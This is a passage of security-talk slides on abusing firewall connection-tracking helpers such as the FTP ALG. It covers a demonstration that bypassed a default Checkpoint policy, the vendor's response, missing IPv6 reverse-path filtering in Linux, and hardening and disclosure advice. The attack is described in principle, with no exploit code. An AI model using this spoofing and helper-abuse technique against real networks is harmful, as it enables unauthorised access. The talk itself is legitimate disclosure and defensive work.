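          would_drop(topo, "eth0", "2001:db8:2::2"))
```

The attack packet of this talk is the `would_drop(topo, "eth0", "2001:db8:2::2")` case: a frame carrying the server's address but entering on the client interface. Interfaces left out of the topology are not protected at all, which is the reason the function reports them as not dropped rather than guessing.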

Checkpoint setup

Checkpoint absolute newbie
I did not read the documentation.
Why should I? I've been working on firewalls for many years.
That's the newbie reflex.

Used software
Demonstration version.
Minimal features installed.
Default installation.

Demonstration setup

Let's build a filtering policy with a single rule allowing FTP, and install the resulting policy.

Demonstration

Video: let's take a firewall with a filtering policy allowing only port 21, and open a connection to port 22 on the FTP server.

Policy violation

We managed to open a connection to port 22, with a filtering policy that does not allow it.
But the connection was blocked after a few packets.
The Checkpoint GUI displays a warning about anti-spoofing.

There is no problem

Swift reaction of the Checkpoint security team
Them: Configuring anti-spoofing is a basic requirement.
Me: Are you planning some action regarding this issue?
Them: Anti-spoofing exists exactly for such issues. So [we] don't think that we need to do anything.

Basic requirement
Choose your contractor well: the security level depends on his skills.

Introduction
Netfilter and the Conntrack
Degree of freedom in Netfilter helpers
Attacking connection tracking helpers
    Attack description
    Conditions and principles
    FTP case
    Other protocols
Impact and existing protection
    Netfilter
    Checkpoint
Conclusion

Other products

A generic attack
The attack may impact other firewall brands using ALGs.
Many of these firewalls remain untested:
- Netfilter-based firewalls,
- iptables frontends,
- firewalls using ALGs.

Testing
Easy to do with the opensvp script.
Contact me if you are interested in using it.

Low level attacks are not dead

IPv6: Linux teaches the hard way
For the sake of performance, rp_filter for IPv6 was not developed.
Two patch proposals were refused.
Hopefully, a Netfilter reverse path filtering match module will be available in Linux 3.3.

Checkpoint default configuration
Usability entails insecure default values.
Anti-spoofing on a Checkpoint cluster seems problematic to manage.
See: http://rivald.blogspot.com/2011/01/checkpoint-utm-firewall-clusters-part-2.html

Firewall survival guide

Getting up is dangerous
Going up the OSI layers is dangerous.
Old protocols such as FTP are dangerous.
New ones such as SIP continue in the same vein.

About the security level
Secure by default is a myth:
- The default configuration can be vulnerable to attacks.
- Don't leave any warning unpunished.
Defense in depth should not remain a myth:
- Protect internal services even if they are behind a firewall.
- Physically separating the router and the firewall was a good idea.
- Using both rp_filter and iptables-based anti-spoofing was also a good one.

Handling a generic attack

A really difficult task
It is impossible for one individual
- to get the list of potentially vulnerable products,
- to contact all the relevant people.
It is even worse when custom iptables scripts are vulnerable.

Possible help
Contact a CERT.
- If you get no response, send them a second e-mail.
- Try to contact CERT Luxembourg or CERT Finland.
- Microsoft Vulnerability Research (MSVR) is an alternative to CERT.
Contact the oss-security mailing list if open source software is involved.

Questions

Do you have any questions?

Thanks to
Pablo Neira, Patrick McHardy: kernel developers can be friendly.
Sébastien Tricaud, Alexandre Dulaunoy: for their help and because APT can be fun.

More information
My blog: http://home.regit.org
Secure use of iptables and connection tracking helpers: http://home.regit.org/netfilter-en/secure-use-of-helpers/

Contact me
E-mail: [email protected]
Twitter: @Regiteric